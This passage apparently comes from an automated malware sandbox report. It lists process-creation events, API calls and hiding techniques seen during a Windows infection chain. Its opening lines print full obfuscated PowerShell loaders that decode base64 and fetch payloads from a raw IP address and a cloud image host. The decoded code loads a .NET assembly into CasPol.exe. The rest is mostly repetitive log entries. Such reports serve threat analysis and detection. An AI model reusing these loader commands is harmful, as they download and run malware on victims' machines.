FB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblemJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004567E0 push eax; ret 12_2_004567FE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433FF6 push ecx; ret 12_2_00434009
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
